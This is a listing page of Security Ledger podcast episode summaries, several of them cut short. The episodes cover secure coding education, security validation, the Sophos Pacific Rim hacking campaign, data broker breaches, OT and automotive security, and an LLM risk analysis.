In this episode of the podcast, host Paul Roberts welcomes Tanya Janca of She Hacks Purple back into the studio. Tanya talks about her newly released book: Alice and Bob Learn Secure Coding, published by Wiley and the larger problem of how to promote the teaching of secure coding practices to developers.



[Video Podcast] | [MP3] | [Transcript]







In today’s Security Ledger podcast, Paul welcomes the amazing Tanya Janca back to the studio. The founder of She Hacks Purple and the We Hack Purple community, Tanya does secure coding training, and developer relations at SemGrep. She’s a passionate advocate for teaching secure development practices and promoting secure application design.



In our conversation, Tanya dives deep into her new book, “Alice and Bob Learn Secure Coding,” a guide to secure coding for everyone from new- to experienced developers. We unravel her journey from doing coding to becoming a recognized expert in application security and secure software.



Tanya Janca is the founder of She Hacks Purple


Her journey highlights one of the software industry’s quirks: while the path to becoming a developer is straightforward, the paths to doing application security as a profession are seemingly arbitrary. Tanya’s own experiences underscore the need for secure coding to be intrinsic to every software developer’s education. And that was the inspiration for her new book, after Wiley’s Jim Minitel prompted her to write the book she would have wanted to read to make the transition from a developer to an application security professional.



Bridging the Gap Between Developers and Security



One of the big issues that complicate efforts to improve software security is the gap that exists between security and development teams .Contrary to popular belief, software developers and security teams operate in distinct realms with unique skill sets, and are often siloed within software development organizations.



This divergence calls for tailored approaches to instill security practices in software development—something her new book aims to achieve by addressing practical methodologies rather than dwelling solely on vulnerabilities.



In Alice and Bob Learn Secure Coding, Tanya explores the full breadth of secure coding practices, highlighting the importance of holistic practices across languages, frameworks, and technologies. She calls for a shift from relying on scare tactics to fostering a proactive, security-minded culture in software development teams. That includes a shift from the current focus on features and rapid release cycles to robust security measures. Tanya encourages developers to question existing norms and engage in conversations that could shift project trajectories towards more secure outcomes. That might include everything from questioning data permissions in application development to advocating for mandatory cybersecurity education for students and young software engineers.




“If you learn secure coding, you’re going to have less bugs later, which means you have less things to do later. If you are not creating the bugs in the first place, everything’s better, right? You save money, you save time, all these things.”— Tanya Janca, She Hacks Purple




One solution might be greater governmental involvement to establish robust cybersecurity...

In this Spotlight episode of The Security Ledger Podcast, Paul speaks with David Kellerman, the Field CTO at Cymulate, about the growing complexity of the cyber threat landscape -and IT security deployments. David and I delve into the growing demand for security validation technology, like Cymulate’s, that allows organizations to assess the utility and effectiveness of their security investments.




Watch the video



Read the transcript



Download the MP3








Cyber threats and attacks are metastasizing – and proposed solutions along with them. That’s been the dynamic for decades, as new cybersecurity tools and technologies emerge in response to changes in the threat landscape: a steady march from firewalls to AV to intrusion detection…DLP, application firewalls, EDR, and on and on.



But as IT deployments – and the landscape of cybersecurity solutions – have become more crowded and complex, security teams are under pressure to re-think their investments: focusing energy, resources and attention on the tools that actually work – addressing real world problems and lowering risk. The question: how to know which security tools are providing the best protection? Another question: is your organization maximizing the tools you have to address the risks and security exposures that are most relevant to your firm.



Enter the fast growing field of security validation: AI-powered technology that allows organizations to simulate malicious attacks and assess the effectiveness of existing or proposed security solutions as they seek to block or respond to attacks. It’s a market that Cymulate, the Israel-based maker of automated security validation tools, knows well.



In our latest Spotlight Podcast, I am joined by David Kellerman, Field CTO at Cymulate. Together, we delve into the ever-evolving landscape of cybersecurity and the significance of security validation technology as threats and sophisticated attacks mount. Cymulate’s technoogy focuses on threat exposure: allowing firms to continuously test and optimize their security with a focus on the exploitable risks within their environment that are most likely to be abused by malicious actors.



While companies these days often have the necessary tools on hand to secure their assets, the challenge lies in their optimization and implementation, David tells me. Security drift is also a concern — the gradual erosion of protective measures due to inevitable environmental changes, like relaxed or unexpected configurations leading to vulnerabilities. And David stresses the importance of moving beyond default configurations to ensure maximum efficacy against evolving threats.



Understanding Security Validation



In our discussion, David highlights Cymulate’s core mission: empowering security teams to validate and optimize their security controls: simulating attacks and enabling companies to measure the effectiveness of their cybersecurity defenses. This approach allows businesses to identify vulnerabilities a...

In this episode of The Security Ledger Podcast (#259) Paul speaks with Ross McKerchar, the CISO of Sophos, about the the company’s recent, headline grabbing report on a six year, state sponsored hacking campaign it dubbed Pacific Rim. Ross talks about the company’s dawning awareness of the extent and sophistication of the operation and its use of a targeted software implant to monitor the workings of the state-sponsored group and stay a step ahead of the hackers efforts to breach Sophos and its customers.




Watch Video



Download the MP3



Read the Transcript








After so many decades writing about hair raising cyber attacks, it is easy to get jaded -and hard to be impressed. And then something like the Pacific Rim report comes along. Released last month by the UK-based cybersecurity firm Sophos, Pacific Rim is an eye-raising account of a years-long battle with persistent and sophisticated hackers based in China who were determined to compromise Sophos and use their access to target the company’s customers.



Ross Mckerchar is the CISO at Sophos.


A six year stealth campaign



The Sophos Pacific Rim report paints a detailed picture of a relentless nation-state level cyber assault that was years in the making. The attack, emanating from a well-resourced group of PRC-based actors, wasn’t a conventional one-off breach but rather a protracted, six-year campaign involving a wide range of entities and software assets across regions, beginning in India with the compromise of a wall-mounted display at Cyberoam, a company Sophos had acquired. From there, the attackers used “live off the land” techniques to infiltrate other systems, exploiting vulnerabilities to gain unauthorized access to sensitive areas, all the while showcasing advanced techniques that far exceeded the kind of low-skill script kiddie or hacker tactics, and elevated concerns about the breadth of their capabilities.



ORBs and AWS: China’s sophisticated hacking techniques



In this podcast, I sat down with Ross McKerchar to dig into the Pacific Rim incident. Ross and I talk about his company’s quick realization that what appeared to be a run-of-the-mill intrusion onto Cyberoam’s network was much more: one branch of a global campaign by Chinese-backed hacking groups to gain access to a wide range of sensitive targets, from tech firms to critical infrastructure providers to government agencies and embassies.



Ross and I discuss the evolution of attack methodologies by China-based threat groups, as well as the many characteristics that made the Pacific Rim stand out, such as the attackers’ utilization of cutting edge cloud-based management tools like AWS SSM to elevate their intrusion capabilities and “ORBs” (operational relay boxes) -a kind of purpose built botnet of compromised devices that hacking groups use as a foundation for further attacks.



A timeline of the Pacific Rim campaign. (Image courtesy of Sophos.)

In this episode of The Security Ledger Podcast (#258) Paul speaks with Lawrence Gentilello, the co-founder and CEO of Optery, a startup in the personal data management space. Lawrence and I talk about the growing scandal around breaches at firms like AT&T and data brokers that have exposed the sensitive data on hundreds of millions of Americans to cyber criminals, and how Optery and firms like it are looking to empower consumers to claw their data back from these porous data brokers.



[Video Podcast] | [MP3] | [Transcript]







If you are like me and subscribe to an identity protection service, your phone likely blew up in early August with foreboding messages that your email, Social Security Number and other information had turned up on “the dark web” – that massive constellation of sites invisible to search engines where malicious actors and stolen data congregate.



The cause? A huge breach of the data broker NationalPublicData that likely contained information on more than 130 million Americans, dead and alive, according to an estimate by Troy Hunt of HaveIBeenPwned. Hunt was quoted in a report on the breach by Brian Krebs over at Krebs on Security. NationalPublicData issued a statement on August 12th acknowledging “incidents” that it claims began with an effort to “hack into data” in December 2023, and that led to “leaks of certain data” in April 2024 and “summer 2024. (Umm…for those of us in the Northern Hemisphere, isn’t “summer 2024” now?!) .



The information breached included names, email addresses, phone numbers, social security numbers, and mailing addresses, NationalPublicData said.



And, if you’re like me, this probably isn’t the first time this year that you’ve been inundated with warnings about your personal data being at risk. Just weeks before the NationalPublicData breach came to light, there were similar warnings in the wake of a massive breach of telecommunications giant AT&T. That company acknowledged in mid July that it was the victim of a cyber attack on a third party cloud storage provider in April that disgorged records of calls and texts for nearly all AT&T cellular customers – hundreds of millions of people. That’s an almost unmatched treasure trove of information for nation state actors that could easily be used to help reconstruct their social networks, patterns of communications and even their physical locations, as the Mozilla Foundation noted in its analysis.



Houston, We’ve Got Your Data!



So, “Houston, we’ve got a problem!” Or maybe “Houston, we’ve got your data!” 🙂



Private firms have been harvesting, storing and monetizing mountains of our personal data, gleaned from our movements, behaviors and financial activity online. But – as is abundantly clear- those firms are not particularly careful about protecting that data from malicious actors. Nor are they transparent about how the data they’ve collected is being stored and used.

In this Spotlight episode of the Security Ledger podcast, I interview Chris Walcutt, the CSO of DirectDefense about the rising cyber threats facing operational technology (OT). Chris and I talk about how industry is responding – including the growing role of government, ISACs and managed security services providers (MSSPs) in helping shore up the security of critical infrastructure.



[Video Podcast] | [MP3] | [Transcript]







There is no question that critical infrastructure and the operational technologies that are used to support that infrastructure are in the cross hairs of state actors and – in many cases – under active attack. The question is: what to do about it.



Chris Walcutt is the Chief Security Officer at DirectDefense.


Volt Typhoon: Is The Coming Storm Already Here?



In March, for example, CISA the US Cybersecurity and Infrastructure Security Agency warned the heads of critical infrastructure organizations about the ongoing activities of “Volt Typhoon” and advanced persistent threat (APT) group linked to China’s military. An advisory from February issued by CISA, the NSA and FBI asserted that People’s Republic of China (PRC) state-sponsored cyber actors are positioning themselves on IT networks and maintaining persistent access in anticipation of launching “disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict” with the U.S.



Critical Infrastructure And Digital Transformation: A Risky Combination



Campaigns like that aren’t new. Warnings about state sponsored actors sniffing around U.S. critical infrastructure go back more than a decade. What has changed is the exposure of industrial firms to cyber attacks, as “digital transformation” and the explosion of remote work have resulted in organizations that own and operate critical infrastructure being far more vulnerable to attacks and compromises.



Add to that the high social and economic impacts of critical infrastructure attacks; the varied nature of OT systems (and risks); endemic shortages of cybersecurity talent; and – in many sectors – inadequate budgeting to support cyber operations and you have a recipe for disaster.



Securing OT Systems: Help Is On The Way



But all is not lost. In our latest Spotlight podcast, recorded on the sidelines of the RSA Conference in San Francisco last month, I sat down with Chris Walcutt, the Chief Security Officer at DirectDefense.



Chris and I talked about the rapidly changing threat landscape that critical infrastructure owners and operators inhabit, and how savvy firms are managing OT risks – in part by tapping managed security services firms with expertise managing and securing OT systems and environments.



In our conversation, Chris elaborates on the distinction between OT (Operational Technology) and IT, emphasizing the unique challenges in securing OT systems like those in critical infrastructure,

In this Spotlight Podcast,



In this Spotlight episode of the Security Ledger podcast, I interview Chris Walcutt of DirectDefense about the rising cyber threats facing operational technology (OT). Chris and I talk about how organizations that manage OT – including critical infrastructure owners – are being targeted by sophisticated cyber actors and the strategies best suited to manage increased cyber risks to OT environments.



[Video Podcast] | [MP3] | [Transcript]







Cyber attacks on critical infrastructure have gone, in the past two decades from the hypothetical, to the actual, to the epidemic. Today, malicious actors from cybercriminal ransomware gangs to nation-state affiliated hacking groups are teeing up vulnerable operational technology (OT) environments. As CISA noted in a February Advisory about Chinese infiltration of critical infrastructure providers, the goal of many of these groups is long term persistence and – eventually – disruption of critical functions such as power distribution at a time of their choosing.



Christopher Walcutt is the CSO at DirectDefense


How should companies respond to the increasing risks to OT systems and environments? In our latest Spotlight episode of the Security Ledger podcast, I sat down with Christopher Walcutt, Chief Security Officer at DirectDefense, to talk about the changing cybersecurity landscape for critical infrastructure and the challenges (as well as the solutions) that organizations face today.



Chris’s Cybersecurity Journey



Starting his career on a help desk for a Fortune 200 energy firm, Christopher’s path to infosec is a testament to the many unexpected routes leading to cybersecurity expertise. Starting out on a help desk, Chris worked his way up to roles as a system administrator and network engineer, eventually taking the IT helm at a power provider with a portfolio of over 30 North American plants, including three nuclear facilities.



Chris’s time in the industry saw the inception of NERC CIP regulations – the first cybersecurity rules directed at critical infrastructure (with the exception of nuclear facilities). Since then, the dialogue about cybersecurity has evolved from a focus on checking compliance checkboxes to addressing cybersecurity as an existential organizational risk amid mounting threats and attacks. Chris and I dig deep on this paradigm shift, and the growing focus within critical infrastructure sectors on resilience vs. simple compliance.



Addressing the Human Factor in OT Cybersecurity



While OT environments present a number of challenges, many of the most significant risks facing OT environments stem from “layer 8” in other words: “the human factor.” As Chris and I discuss, social engineering attacks are the first step in many sophisticated attacks. Accordingly, Chris stresses the importance of security training for employees that is focused on creating memorable learning experiences. For example: by sharing real-world examples as a part of awareness education, organizations can discuss practical measures they use to bolster defenses against sophisticated cyberattacks, underscoring the nuanced nature of cybersecurity threats which defy mere technical solutions.

In this Spotlight episode of the Security Ledger podcast, I interview Jim Broome, the President and CTO of the managed security service provider DirectDefense. Jim and I talk about the findings of DirectDefense’s latest Security Operations Threat Report and dig into the intriguing ways artificial intelligence (AI) is shaping both cyberattack and defense automation strategies.



[Video Podcast] | [MP3] | [Transcript]







One of the things I’ve noticed is that the growth and evolution of the cybersecurity industry has been so rapid – encompassing a bit more than two decades – that you can sit down for an interview with someone who is simultaneously in the prime of their career and an “OG” who has personally witnessed the birth, awkward adolescence and rapid maturity of the information security space.



Jim Broome is the President and CTO at DirectDefense.


That was my experience sitting down with Jim Broome, the President and Chief Technology Officer at DirectDefense, a managed security service provider. Jim’s journey to cyber started back in the 80s as the son of a Radio Shack franchise owner in the southern U.S. By high school, Jim had thrown himself into the nascent Internet: launching one of the biggest BBS-es (bulletin board systems) in Georgia – a community that was ultimately acquired by CompuServe, an early consumer-focused Internet service provider.



After graduating from Georgia Tech, Jim started his career as so many others did – working as an IT administrator supporting customers and rolling out networks for banks and other early adopters of networked technologies. He went on to work for an early CheckPoint reseller at a time when “network firewall” was term that would get you cocked heads and strange looks from business owners. Jim eventually found his way to the seminal cybersecurity firm Internet Security Systems (ISS) in the late 1990s working alongside the likes of Caleb Sima where he was among the first wave of hands-on cyber practitioners helping companies to assess their cyber risk.



DirectDefense’s 2024 Security Operations Threat Report


All that history gives Jim a unique perspective on the current state of cyber security, which we talk about in this Security Ledger Spotlight Podcast. In it, Jim looks back on the early challenges of cybersecurity, the diversification of threats over the decades, and the factors that are driving our current epidemic of cyber attacks, including the rapid embrace of artificial intelligence (AI) by both attackers and defenders.



Jim and I also dig into the highlights from the latest DirectDefense Security Operations Threat Report and get Jim’s views on the current landscape of cybersecurity, including the growing problem of attacks on multi-factor authentication and the importance of adaptive defense mechanisms. We also touch on the critical role of MSSPs in covering a cybersecurity skills and coverage gap.

In this episode of The Security Ledger Podcast (#257) Paul speaks with Dennis Kengo Oka, a senior principal automotive security strategist at the firm Synopsys about the growing cyber risks to automobiles as connected vehicle features proliferate in the absence of strong cybersecurity protections.



[Video Podcast] | [MP3] | [Transcript]







Almost from the get-go, automobiles symbolized a kind of dynamic and restless American identity. The auto industry epitomized U.S.’s vibrant and innovative economy. With the help of some serious federal dollars, they also became indispensable parts of 20th century American life. By the 1950s, accepted wisdom was that automobiles and the automotive industry were inextricably linked to the well being of the U.S. – what’s good for GM is good for the United States, and vice versa – as the saying went.



Dennis Kengo Oka is a senior principal automotive security strategist.


But all that romanticizing of cars and the cheerleading of the powerful and influential auto industry forestalled much-needed oversight of vehicles. The auto industry fought calls for federal auto safety rules and requirements for decades, arguing that driver error and unsafe roads were responsible for accidents, not their vehicles.



A four decade delay in vehicle safety regulation



It wasn’t until the mid 1960s that Congress got around to passing the National Traffic and Motor Vehicle Safety Act in the wake of the publication of Ralph Nader’s Unsafe at Any Speed – an expose of how the auto industry prioritized style and features over safety. By that time, automobile accidents were responsible for 49,000 deaths, 1.8 million minor injuries, and $8.5 billion in damages, lost wages, and medical expenses annually. (By comparison, 46,980 people died in auto accidents in the U.S. in 2021, despite the fact that the number of registered vehicles on the roads has more than tripled in the intervening years, from around 90 million vehicles in 1965 to more than 280 million in 2021.)



Since then, the auto industry’s tune on vehicle safety has done a 180 degree turn. Safety features -like airbags and collision avoidance – and vehicle safety ratings are, today, a key selling point for cars. But that focus on safety doesn’t extend to the software that increasingly runs our vehicles.



Vehicle safety? Critical! Vehicle software safety…umm….



As with the advent of the automobile in the first decades of the 20th century, the arrival of the “smart car” in the first decades of the 21st century has transpired as an industry-led initiative transpiring in a vacuum of government oversight, regulation and guidance. The result: exploitable cyber-physical software flaws were documented starting as early as 2011, with a dramatic display of the potential to use software...

In this episode of The Security Ledger Podcast (#256) Paul speaks with Gary McGraw of the Berryville Institute of Machine Learning (BIML), about that group’s latest report: an Architectural Risk Analysis of Large Language Models. Gary and Paul talk about the many security and integrity risks facing large language model machine learning and artificial intelligence, and how organizations looking to leverage artificial intelligence and LLMs can insulate themselves from those risks.



[Video Podcast] | [MP3] | [Transcript]







Four years ago, I sat down with Gary McGraw in the Security Ledger studio to talk about a report released by his new project, The Berryville Institute of Machine learning. That report, An Architectural Risk Analysis of Machine Learning Systems, included a top 10 list of machine learning security risks, as well as some security principles to guide the development of machine learning technology.



Gary McGraw is the co-founder of the Berryville Institute of Machine Learning



The concept of cyber risks linked to machine learning and AI – back then – were mostly hypothetical. Artificial Intelligence was clearly advancing rapidly, but – with the exception of cutting edge industries like high tech and finance – its actual applications in everyday life (and business) were still matters of conjecture.



An update on AI risk



Four years later, A LOT has changed. With the launch of OpenAI’s ChatGPT-4 large language model (LLM) artificial intelligence in March, 2023, the use- and applications of AI have exploded. Today, there is hardly any industry that isn’t looking hard at how to apply AI and machine learning technology to enhance efficiency, improve output and reduce costs. In the process, the issue of AI and ML risks and vulnerabilities -from “hallucinations” and “deep fakes” to copyright infringement have also moved to the front burner.



Back in 2020, BIML’s message was one of cautious optimism: while threats to the integrity of LLMs were real, there were things that the users of LLMs could do to manage those risks. For example, scrutinizing critical LLM components like data set assembly (where the data set that trained the LLM came from); the actual data sets themselves as well as the learning algorithms used and the evaluation criteria that determine whether or not the machine learning system that was built is good enough to release.



AI security: tucked away in a black box



By controlling for those factors, organizations that wanted to leverage machine learning and AI systems could limit their risks. Fast forward to 2024, however, and all those components are tucked away inside what McGraw and BIML describe as a “black box.”




So in 2020 we said. There’s a bunch of things you can do around these four components to make stuff better and to under...